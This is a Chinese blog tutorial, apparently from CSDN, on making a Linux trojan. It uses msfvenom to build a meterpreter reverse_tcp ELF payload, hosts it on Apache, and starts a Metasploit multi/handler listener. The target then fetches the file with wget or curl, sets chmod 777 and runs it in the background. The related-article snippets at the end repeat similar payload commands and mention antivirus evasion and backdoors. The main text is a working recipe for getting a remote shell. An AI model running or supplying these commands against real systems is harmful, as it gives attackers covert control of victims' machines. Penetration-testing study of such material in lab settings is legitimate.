生成payload木1马 攻击 linux

已于 2022-05-07 15:04:32 修改
阅读量644 收藏 3
点赞数
分类专栏: 安全渗透 文章标签: linux 运维 服务器
于 2022-05-07 01:43:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54472394/article/details/124622497
版权

需要

1.生成payload 木马
2.开启httpd
3.启动msfdb run 监听
4.目标机下载payload 并执行
5.
6.

开始

1: 生成payload 木马 把他存放到httpd服务的 /var/www/html/下

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.0.55 LPORT=4444 -b "\x00" -f elf -o /var/www/html/xuegod-ghost

参数说明
-p 选择一个模块吧。
-b 在生成的程序中避免出现的值
-f 生成的文件格式
-o payload存放目录
-h 帮助

2.开启httpd 让目标机下载我的payload病毒

systemctl start apache2

参数说明
-p 选择一个模块吧。
-b 在生成的程序中避免出现的值
-f 生成的文件格式
-o payload存放目录
-h 帮助

3.启动msfdb run 监听 加载 1里面生成的payload :linux/x64/meterpreter/reverse_tcp

msfdb run
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.0.55
msf6 exploit(multi/handler) > set lport 4444
msf6 exploit(multi/handler) > run

参数说明

4.目标机下载payload

第一种下载方式

wget http://192.168.0.55/xuegod-ghost

第二种下载方式

curl http://192.168.0.55/xuegod-ghost -o xuegod-ghost

在目标机后台执行payload

chmod 777 xuegod-ghost
./xuegod-ghost &

参数说明
&: 后台执行

目标机运行 payload kali就获取到了

--------------其他参数--------------

可以查看xuegod文件的进程情况

ps -aux|grep xuegod

ps -aux : 查看全部文件进程
grep xuegod : 筛选xuegod文件

杀死进程

kill -9 id

-9 :杀进程

兰兰不懒
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
kali-linux 工具Metasploit离线式攻击使用教程
12-29
总结来说,Metasploit的离线攻击涉及了离线数据库的管理、模块的导入与使用、payload生成与传递等多个环节。熟练掌握这些步骤,可以在多种环境中灵活地进行安全测试,提升网络安全防护能力。学习这个教程,你将更...
14、TheFatRat生成工具-创建后门或payload
无痕的博客
12-14 1945
TheFatRat生成工具创建后门或payload
制作linux恶意软件获取shell加实战
xiao_he0123的博客
02-25 1202
一.使用msf制作linux后门 二. 实战,给软件加后门 制作linux后门 1.使用msfvenom生成linux可执行文件 msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp LHOST=192.168.124.3 LPORT=4444 -b '\x00' -i 10 -f elf -o /var/www/html/xueguo -a x64 ...
网络安全最新【网络安全】 MSF生成教程,2024年最新网络安全0基础方法类
最新发布
2401_84558467的博客
05-10 242
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供:因篇幅有限,仅展示部分资料2、使用监听模块。
记一次PHP清理事件
一只烦恼的猪
02-09 3610
代码后门一般为以下4种: 1、以特殊代码文件存在,例如一句话; 2、嵌入在正常执行逻辑中的可执行代码; 3、通过可接收任意参数的代码,将参数写入到固定的可访问文件中,通过浏览器请求执行; 4、通过遗留特殊的方法,绕过权限认证或通过无权限控制的方法来控制系统。
创建Metasploit Payloads
一个码农的笔记
01-31 1384
Often one of the most useful (and to the beginner underrated) abilities of Metasploit is the msfpayload module. Multiple payloads can be created with this module and it helps something that can give y
监控web站点目录(/var/html/www)下所有文件是否被恶意篡改。
51DevOps-刺天冬
05-12 738
监控web站点目录(/var/html/www)下所有文件是否被恶意篡改(文件内容被改了),如果有就打印改动的文件名(发邮件),定时任务每3分钟执行一次。 [root@db01 ~]# mkdir -p /var/www/html [root@db01 ~]# find /etc -type f -name "*.conf" -exec cp {} /var/www/html/ \; [root@qls /service/scripts]# cat file_md5.sh #!/bin/bash
msfvenom常用生成payload命令(第十课).docx
09-15
其中,`-a x86` 指定了架构为 x86,`--platform Linux` 指定了平台为 Linux,`-p linux/x86/meterpreter/reverse_tcp` 指定了 Payload 类型为 Meterpreter Reverse TCP,`LHOST` 和 `LPORT` 指定了攻击机的 IP 和...
E025-渗透测试常用工具-使用msfvenom生成进行渗透测试.pdf
12-02
生成payload时,还需要指定输出格式 (`-f`) 和输出文件路径 (`-o`)。例如,`-f exe` 创建一个Windows可执行文件,`-o path/to/file.exe` 指定保存路径。`-a` 参数用于指定payload的架构,如`x86`或`x64`。 对于某些...
Metasploit 实现生成、捆绑及免杀-内含源码以及设计说明书(可以自己运行复现).zip
05-08
1. **选择 Payload**: 在 Metasploit 中,payload攻击的核心部分,它可以是简单的 shellcode 也可以是复杂的后门程序。根据目标系统和需求选择合适的 payload,如 `reverse_tcp` 或 `bind_tcp`。 2. **配置 ...
linux-ReverseShellasaService反弹shell即服务
08-13
5. **Payload生成**:攻击者可能需要生成特定的shellcode或利用,以在目标系统上创建反弹shell。这可能涉及到对二进制格式的理解以及汇编语言的知识。 6. **权限提升**:如果目标是获取更高的系统权限,攻击者可能...
生成msf常用payload
hl1293348082的专栏
04-07 2574
msf作为一款强大的漏洞检测工具,如何生成适用于msf的payload以及如何利用是使用msf的关键,今天就主要记录一下常用的payload以及如何使用。生成payload使用的工具是MSFVenom,下面看看他的帮助信息。 在kali下可以使用如下命令列出MSFVenom可以生成payload列表: msfvenom -l 正在上传…重新上传取消 生成二进制文件 关于二进制文件,主要介绍适用于Windows、linux、mac操作系统的payload生成与利用。 Windows ms
【网络安全】跨站脚本攻击漏洞(了解)
love_wgll的博客
03-02 622
介绍跨站脚本攻击漏洞
msf生成linux elf反弹不成功的解决方法
热门推荐
weixin_42109829的博客
01-06 1万+
0x01 前言 这几天我的msf 要生成linux 一直反弹不成功,用的是以下的paylaod msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.233.131 LPORT=4444 -f elf > mshell.elf 我分析了一下报错,这个报错是没问题的,但生成只有250b ,这明显是不 0x02 解决问题 我刚开始认为是我msf的问题 ,回来验证了一下,我的msf 是6的版本,而这个语句是5的写法,而我启动
msf渗透测试学习-与永恒之蓝漏洞案例
weixin_49349476的博客
06-08 4518
MSF是Metasploit Framework的缩写,是一款广泛使用的渗透测试工具,具有强大的攻击功能。它提供了一个模块化的平台,通过将各种攻击载荷、漏洞利用和辅助工具组装在一起,可用于模拟各种攻击,测试系统安全性,也可以用于执行红队实战训练、漏洞挖掘等工作。
Kali-linux免杀Payload生成工具Veil
2301_77162959的博客
05-18 962
Veil是一款利用Metasploit框架生成相兼容的Payload工具,并且在大多数网络环境中能绕过常见的杀毒软件。本节将介绍Veil工具的安装及使用。
究极踩坑版msf6成功复现Distcc后门漏洞
weixin_69925635的博客
07-18 230
使用msf6复现distcc后门漏洞,详细介绍踩坑及纠错过程
Linux提权的四个脚本发布啦!
Free雅轩的博客
03-23 813
只需在终端键入python linuxprivchecke.py就可以使用该脚本,该脚本将枚举文件和目录的权限和内容。当它发现一个组可写的文件或目录时,如果这个组包有超过一个的非root用户,它只标记一个结果。用户信息:当前用户,列出所有用户的uid/gid信息,列出root用户,检查密码hash是否保存在/etc/passwd。完成下载之后,你就可以在终端中通过键入./LinEnum.sh来运行它。在UNIX系统上检测提权向量的shell脚本,它可以在UNIX和。系统信息:主机名,网络信息,当前IP等。
渗透测试实例--Metasploitable2靶机
lxy123_com的博客
02-01 4066
实验环境:Kali Linux虚拟机一台,4G运行,Metasploitable2靶机一台 实验目的: 实验步骤:
kali的payload
10-20
Kali的payload是指在Kali Linux操作系统中使用的一种攻击载荷,它可以被用来利用漏洞或者进行渗透测试。在Kali中,Metasploit是一个非常流行的工具,它可以生成各种类型的payload...3. 如何使用Metasploit生成payload

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值